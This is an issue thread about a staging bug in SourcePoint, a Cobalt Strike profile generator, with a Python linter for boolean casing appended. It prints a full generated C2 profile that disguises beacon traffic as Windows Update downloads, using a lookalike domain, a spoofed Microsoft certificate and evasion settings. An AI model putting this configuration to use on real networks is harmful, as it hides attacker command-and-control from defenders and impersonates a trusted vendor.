Closed monpolo closed 3 years ago
Tinkered around a bit, if I comment out the first line so it's
It works just fine now. Again, could very well be a silly mistake on my part but from how I'm interpreting your readme it seems this is unexpected behavior.
Looks like it's a case-sensitivity issue. I will update it tonight and close this ticket once the new version is pushed. Thank you for letting me know.
Fixed in version 1.2
This is from the latest version of Cobalt Strike, downloaded today. Quite possibly user error but I'd appreciate any insights you could provide.
Generating Profile:
```
┌──(kali㉿kali)-[~/Desktop/SourcePoint-main]
└─$ ./SourcePoint -Injector NtMapViewOfSection -Host 0012eb.lwindowsupdate.com -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome
[*] Preparing Varibles...
[*] Building Profile...
[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
[*] Post-Ex Process Name: gpupdate.exe
[*] Seleted Profile: WindowsUpdate
[+] Profile Generated: teststage2.profile
[+] Happy Hacking
```
Starting CS says:
```
┌──(kali㉿kali)-[~/Desktop/cs-1/cobaltstrike]
└─$ sudo ./teamserver 192.168.2.200 password ./teststage2.profile
[*] Will use existing X509 certificate and keystore (for SSL)
[+] I see you're into threat replication. ./teststage2.profile loaded.
[*] Loading properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop).
[!] Properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop) was not found.
[!] Woah! Your profile disables hosted payload stages. Payload staging won't work.
[+] Team server is up on 0.0.0.0:50050
[*] SHA256 hash of SSL cert is:
```
Output from teststage2.profile:
```
set host_stage "True";
set sleeptime "44000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";
set data_jitter "50";
set smb_frame_header "";
set pipename "plugplay+3850";
set pipename_stager "plugplay+1395";
set tcp_frame_header "";
set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)";
set ssh_pipename "plugplay+##";

# Manaully add these if your doing C2 over DNS (Future Release)
dns-beacon {
    set dns_idle "1.2.3.4";
    set dns_max_txt "199";
    set dns_sleep "1";
    set dns_ttl "5";
    set maxdns "200";
    set dns_stager_prepend "doc-stg-prepend";
    set dns_stager_subhost "doc-stg-sh.";
    set beacon "doc.bc.";
    set get_A "doc.1a.";
    set get_AAAA "doc.4a.";
    set get_TXT "doc.tx.";
    set put_metadata "doc.md.";
    set put_output "doc.po.";
    set ns_response "zero";
}

stage {
    set obfuscate "true";
    set stomppe "true";
    set cleanup "true";
    set userwx "false";
    set smartinject "true";
    set checksum "0";
    set compile_time "05 Jun 2028 09:16:06";
    set entry_point "229200";
    set image_size_x86 "397312";
    set image_size_x64 "397312";
    set name "Windows.System.Diagnostics.dll";
    set rich_header "\x56\xb8\x3f\x82\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x1b\xa1\xc2\xd1\x7b\xd9\x51\xd1\x49\xb1\x55\xd0\x19\xd9\x51\xd1\x49\xb1\x52\xd0\x11\xd9\x51\xd1\x49\xb1\x54\xd0\x0c\xd9\x51\xd1\x12\xd9\x50\xd1\x0f\xdc\x51\xd1\x49\xb1\x50\xd0\x1a\xd9\x51\xd1\x49\xb1\x51\xd0\x13\xd9\x51\xd1\x49\xb1\x58\xd0\x3f\xd9\x51\xd1\x49\xb1\xac\xd1\x13\xd9\x51\xd1\x49\xb1\xae\xd1\x13\xd9\x51\xd1\x49\xb1\x53\xd0\x13\xd9\x51\xd1\x52\x69\x63\x68\x12\xd9\x51\xd1\x00\x00\x00\x00\x00\x00\x00\x00";
}

process-inject {
    # set remote memory allocation technique
}

post-ex {
    # control the temporary process we spawn to
    set spawnto_x86 "%windir%\syswow64\gpupdate.exe";
    set spawnto_x64 "%windir%\sysnative\gpupdate.exe";
}

http-get {
    set uri "/c/msdownload/update/others/2019/12/7jJw9JrTrLDNfSeO3i ";
    client {
    }
    server {
        header "Content-Type" "application/vnd.ms-cab-compressed";
        header "Server" "Microsoft-IIS/8.5";
        header "MSRegion" "N. America";
        header "Connection" "keep-alive";
        header "X-Powered-By" "ASP.NET";
    }
}

http-post {
    set uri "/c/msdownload/update/others/2019/12/b4v2CKdyaMF33ftBarW-faotz ";
    set verb "GET";
    client {
    }
    server {
        header "Content-Type" "application/vnd.ms-cab-compressed";
        header "Server" "Microsoft-IIS/8.5";
        header "MSRegion" "N. America";
        header "Connection" "keep-alive";
        header "X-Powered-By" "ASP.NET";
    }
}

http-stager {
    server {
        header "Content-Type" "application/vnd.ms-cab-compressed";
    }
}

https-certificate {
    set CN "0012eb.lwindowsupdate.com"; #Common Name
    set O "Microsoft Corporation";      #Organization Name
    set C "US";                         #Country
    set L "Redmond";                    #Locality
    set OU "Microsoft IT";              #Organizational Unit Name
    set ST "WA";                        #State or Province
    set validity "365";                 #Number of days the cert is valid for
}
```
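The root cause identified in this thread (a boolean option written as `"True"` is not read as true because the comparison is case-sensitive) is easy to catch before the team server ever loads the profile. The linter below is an added example, not code from SourcePoint or Cobalt Strike; the boolean option names other than `host_stage`, and the sample profile it runs on, are assumptions constructed for this illustration.

```python
import re

# Cobalt Strike only recognizes the lowercase literals "true"/"false" for
# boolean Malleable C2 options; host_stage "True" is what broke staging above.
# Assumption for this example: the other names listed are treated the same way.
BOOLEAN_OPTIONS = {"host_stage", "obfuscate", "stomppe", "cleanup", "userwx", "smartinject"}
# Matches `set <option> "<value>";` anywhere on a line (blocks may be inlined).
SET_RE = re.compile(r'\bset\s+(\w+)\s+"([^"]*)"\s*;')


def strip_comment(line: str) -> str:
    """Drop a '#' comment but leave '#' characters inside double quotes alone."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quote = not in_quote
        elif ch == "#" and not in_quote:
            return line[:i]
    return line


def lint_profile(text: str) -> list:
    """Return (line_no, option, value, message) for each boolean option
    whose value Cobalt Strike would not read as true/false."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        for m in SET_RE.finditer(strip_comment(raw)):
            key, value = m.group(1), m.group(2)
            if key not in BOOLEAN_OPTIONS or value in ("true", "false"):
                continue
            if value.lower() in ("true", "false"):
                msg = f'"{value}" is not lowercase and will not be read as {value.lower()}'
            else:
                msg = f'"{value}" is not a boolean literal'
            findings.append((n, key, value, msg))
    return findings


# Constructed sample: line 1 reproduces the reported bug, line 3 is the
# commented-out workaround, line 4 mixes a good and a bad value in one block.
SAMPLE_PROFILE = '''set host_stage "True";
set sleeptime "44000";
# set host_stage "True";
stage { set obfuscate "true"; set stomppe "True"; }
https-certificate { set CN "example.invalid"; #Common Name
}
'''

if __name__ == "__main__":
    for line_no, key, value, msg in lint_profile(SAMPLE_PROFILE):
        print(f"line {line_no}: {key}: {msg}")
```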